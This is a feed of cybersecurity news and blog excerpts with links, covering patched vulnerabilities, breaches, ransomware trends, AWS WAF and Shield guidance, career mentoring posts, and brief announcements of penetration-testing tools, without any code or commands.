HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy

Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers

Pwnagotchi – Maximize Crackable WPA Key Material For Bettercap
Pwnagotchi is an A2C-based "AI" leveraging bettercap that learns from its surrounding WiFi environment to maximize crackable WPA key material it captures
https://www.darknet.org.uk/2023/02/pwnagotchi-maximize-crackable-wpa-key-material-for-bettercap/

Lessons Learned from Cybersecurity Mentoring
I suppose one could say that I’ve been doing this far too long, and I’ve gained some knowledge about how the cybersecurity industry works, and how people succeed or fail at the field. To give back to newcomers, I recently opened up a Calendly to do ad hoc career mentoring, in addition to the career…
https://tisiphone.net/2023/01/03/lessons-learned-from-cybersecurity-mentoring/

HardCIDR – Network CIDR and Range Discovery Tool
HardCIDR is a Linux Bash script to discover the netblocks, or ranges, (in CIDR notation) owned by the target organization during the intelligence gathering phase of a penetration test.
https://www.darknet.org.uk/2022/12/hardcidr-network-cidr-and-range-discovery-tool/

TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html

Career Counseling Office Hours!
I now have some limited appointments for career counseling and resume discussion open for sign-ups. These sessions are free for college students and current enlisted military, and tip-what-you-can for everyone else, if you feel my help was meaningful. You can sign up here: https://calendly.com/lesleycarhart Keep in mind that I can only review North American…
https://tisiphone.net/2022/12/05/career-counseling-office-hours/

I've Moved to Mastodon!
Hi friends! I hope you’re having a wonderful Thanksgiving weekend (for the US folks), or a nice weekend regardless of location. I just wanted to drop a quick note to let you all know that from now on the best way to follow my daily social media posts, which include Q&As, cybersecurity news, and news…
https://tisiphone.net/2022/11/26/ive-moved-to-mastodon/

Podcast: Securing Bridges | A Live Stream Podcast With Alyssa Miller | Guest: Lesley Carhart | Episode 28
Via: https://www.itspmagazine.com/securing-bridges-podcast
https://tisiphone.net/2022/11/13/podcast-securing-bridges-a-live-stream-podcast-with-alyssa-miller-guest-lesley-carhart-episode-28/

Infosec Mastodon Lists!
Hi pals! I hear you like lists as folks migrate over to Mastodon. Here are some I will keep relatively updated you may find useful, just to track people down! If you want me to remove you for some reason, contact me by DM or email. You can import these lists in your Mastodon preferences…
https://tisiphone.net/2022/11/10/infosec-mastodon-lists/

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022 between 1300-1700 UTC, the OpenSSL project announced the release of a new version of OpenSSL (version 3.0.7) that will patch a critical vulnerability in OpenSSL version 3.0 and above. Only OpenSSL versions between 3.0 and 3.0.6 are affected at the time of writing. At this moment the details of this [...] The post CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/

(Podcast) ITSP – Martial Arts, Marksmanship, And ICS Cyber Incident Response | A Conversation With Lesley Carhart
https://itspmagazinepodcast.com/episodes/martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart-cy-beat-podcast-with-deb-radcliff-2dWkd8yh
https://tisiphone.net/2022/10/10/podcast-itsp-martial-arts-marksmanship-and-ics-cyber-incident-response-a-conversation-with-lesley-carhart/

ASIS Article – Preparing for OT Incident Response
Via: https://www.asisonline.org/security-management-magazine/monthly-issues/security-technology/archive/2022/october/Your-Cyber-Response-Plan-Needs-These-6-Components/ Cybersecurity incidents are no longer a matter of if, but when. Building a good strategy and architecture to deter intrusions is incredibly important in reducing the frequency and severity of incidents, but there is no scenario where any organization is totally immune. That means that every organization must have a plan for what they…
https://tisiphone.net/2022/10/10/asis-article-preparing-for-ot-incident-response/

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/

Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/

Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient input validation flaw, one of 11 patched in an update this week, could allow arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html

Socialscan – Command-Line Tool To Check For Email And Social Media Username Usage
socialscan is an accurate command-line tool to check for email and social media username usage on online platforms. Given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on […]
https://www.darknet.org.uk/2022/04/socialscan-command-line-tool-to-check-for-email-and-social-media-username-usage/

[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html

CFRipper – CloudFormation Security Scanning & Audit Tool
CFRipper is a Python-based library and CLI security analyzer that functions as an AWS CloudFormation security scanning and audit tool. It aims to prevent vulnerabilities from reaching production infrastructure through vulnerable CloudFormation scripts. You can use CFRipper to prevent deploying insecure AWS resources into your cloud environment. You can write your own compliance checks […]
https://www.darknet.org.uk/2022/01/cfripper-cloudformation-security-scanning-audit-tool/

Installing Rogue-jndi on Kali Linux
Following the previous tutorial, in which we looked at the log4j vulnerability in VMware vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker-controlled LDAP server is required to provide the malicious Java class (with a reverse shell, for example) in response to the forged [...] The post Installing Rogue-jndi on Kali Linux appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/

CredNinja – Test Credential Validity of Dumped Credentials or Hashes
CredNinja is a tool to quickly and efficiently test the validity of dumped credentials (or hashes) across an entire network or domain. At its core, you provide it with a list of credentials you have dumped (or hashes; it can pass-the-hash) and a list of systems on the domain (the author suggests scanning […]
https://www.darknet.org.uk/2022/01/credninja-test-credential-validity-of-dumped-credentials-or-hashes/

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...] The post Log4Shell VMware vCenter Server (CVE-2021-44228) appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used to help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. The AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/

An in-depth look at hacking back, active defense, and cyber letters of marque

https://malwaretech.com/2021/11/an-in-depth-look-at-hacking-back-active-defense-and-cyber-letters-of-marque.html

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a “design flaw” in Microsoft Exchange’s Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper, the person who discovered the flaw, the source of the leak is [...] The post The Great Leak: Microsoft Exchange AutoDiscover Design Flaw appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/

Ask Lesley: How Much Should SOC Work Suck?
“Dear Lesley, I’ve been in an MSSP Security Operations Center (SOC) for a few months as my first cybersecurity job. The work is monotonous, I have access to only a few SIEM tools, and most of what I do is handle repetitive tickets for a ton of customers all by myself on awkward shifts. I… Read More Ask Lesley: How Much Should SOC Work Suck?
https://tisiphone.net/2021/09/22/ask-lesley-how-much-should-soc-work-suck/

The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/

Reasonable IR Team Expectations
With the surplus of ransomware attacks consistently increasing, I have unfortunately witnessed another increase – in shoddy and predatory cybersecurity incident response firms with good SEO taking advantage of victims. In some cases this may be opportunistic, and in others simply a side effect of the shortage of senior and principal level incident responders in… Read More Reasonable IR Team Expectations
https://tisiphone.net/2021/05/11/reasonable-ir-team-expectations/

Ask Lesley: From Ops to DFIR, a Tough Transition
Lesley, I am having the hardest time getting my foot in the door in an investigative role. I have spent almost 4 years at the same job, in the same role, and cannot find a way to transition out of the operations side of the house. I went into operations with the intent of doing… Read More Ask Lesley: From Ops to DFIR, a Tough Transition
https://tisiphone.net/2021/03/19/ask-lesley-from-ops-to-dfir-a-tough-transition/

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principle of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune – India Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan Credits: Reuters The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […] The post Houston consulate one of worst offenders in Chinese espionage, say U.S. officials appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Credits: The Register. The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […] The post Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Credits: The Register. TCP/IP co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […] The post Vint Cerf suggests GDPR could hurt coronavirus vaccine development appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Credits: The Register. Britain’s Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […] The post Brit defense contractor hacked, up to 100,000 past and present employees’ details siphoned off – report appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/

US officially warns China is launching cyberattacks to steal coronavirus research
Credits: CNN. The US Department of Homeland Security and the FBI issued a “public service announcement” Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […] The post US officially warns China is launching cyberattacks to steal coronavirus research appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of $10m in cyber-attack
Credits: The Register. The Norwegian Investment Fund has been swindled out of $10m (£8.2m) by fraudsters who pulled off what’s been described as “an advance data breach.” Norfund – the world’s largest sovereign wealth fund, created from saved North Sea […] The post There’s Norway you’re going to believe this: World’s largest sovereign wealth fund conned out of $10m in cyber-attack appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Credits: The Register. Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is “personal data” as defined by the EU’s GDPR and that […] The post Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/

Cyber-attacks hit hospital construction companies
Credits: BBC. Interserve, which helped build Birmingham’s NHS Nightingale hospital, and Bam Construct, which delivered the Yorkshire and the Humber’s, have reported the incidents to authorities. Earlier this month, the government warned healthcare groups involved in the response to […] The post Cyber-attacks hit hospital construction companies appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/cyber-attacks-hit-hospital-construction-companies/

Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases
Credits: The Register. Security researchers at Comparitech have reported that an estimated 24,000 Android apps are leaking user data because of misconfigured Firebase databases. Firebase is a popular backend service with SDKs for multiple platforms, including Android, iOS, web, C++ and Unity (for […] The post Researchers spot thousands of Android apps leaking user data through misconfigured Firebase databases appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/researchers-spot-thousands-of-android-apps-leaking-user-data-through-misconfigured-firebase-databases/

Papa don't breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack'
Credits: The Register. Hackers are threatening to release 756GB of A-list celebs’ contracts, recording deals, and other personal info allegedly stolen from a New York law firm. The miscreants have seemingly got their hands on confidential agreements, private correspondence, contact […] The post Papa don’t breach: Contracts, personal info on Madonna, Lady Gaga, Elton John, others swiped in celeb law firm ‘hack’ appeared first on Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan | Hackers Charity.
http://blog.extremehacking.org/blog/2020/05/13/papa-dont-breach-contracts-personal-info-on-madonna-lady-gaga-elton-john-others-swiped-in-celeb-law-firm-hack/

CVE-2019-19781: Citrix ADC RCE vulnerability
A week before the 2019 holidays Citrix announced that an authentication bypass vulnerability was discovered in multiple Citrix products. The affected products are the Citrix Application Delivery Controller (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway), and the Citrix SD-WAN WANOP appliance. Exploiting the vulnerability could allow an unauthenticated attacker [...] The post CVE-2019-19781: Citrix ADC RCE vulnerability appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/exploit-tutorials/cve-2019-19781-citrix-adc-rce-vulnerability/

Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations
For all scans so far, we've only used the default scan configurations such as host discovery, system discovery and Full & fast. But what if we don't want to run all NVTs on a given target (list) and only test for a few specific vulnerabilities? In this case we can create our own custom scan [...] The post Vulnerability Scanning with OpenVAS 9 part 4: Custom scan configurations appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/openvas-9-part-4-custom-scan-configurations/

Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network
In the previous parts of the Vulnerability Scanning with OpenVAS 9 tutorials we have covered the installation process and how to run vulnerability scans using OpenVAS and the Greenbone Security Assistant (GSA) web application. In part 3 of Vulnerability Scanning with OpenVAS 9 we will have a look at how to run scans using different [...] The post Vulnerability Scanning with OpenVAS 9 part 3: Scanning the Network appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-with-openvas-9-scanning-the-network/

Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning
In the previous tutorial, Vulnerability Scanning with OpenVAS 9.0 part 1, we've gone through the installation process of OpenVAS on Kali Linux and the installation of the virtual appliance. In this tutorial we will learn how to configure and run a vulnerability scan. For demonstration purposes we've also installed a virtual machine with Metasploitable 2 [...] The post Vulnerability Scanning with OpenVAS 9 part 2: Vulnerability Scanning appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-0-part-2/

Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup
A couple years ago we did a tutorial on Hacking Tutorials on how to install the popular vulnerability assessment tool OpenVAS on Kali Linux. We’ve covered the installation process on Kali Linux and running a basic scan on the Metasploitable 2 virtual machine to identify vulnerabilities. In this tutorial I want to cover more details [...] The post Vulnerability Scanning with OpenVAS 9 part 1: Installation & Setup appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/scanning-tutorials/vulnerability-scanning-openvas-9-pt-1/

The Best Hacking Books 2018
One of the most popular and most asked questions since I’ve started this blog is if I can recommend some good hacking books to read for beginners and more experienced hackers and penetration testers. In this article I want to highlight some hacking books and InfoSec books that I personally liked that cover subjects such as ethical hacking, [...] The post The Best Hacking Books 2018 appeared first on Hacking Tutorials.
https://www.hackingtutorials.org/infosec-books/the-best-hacking-books-2018/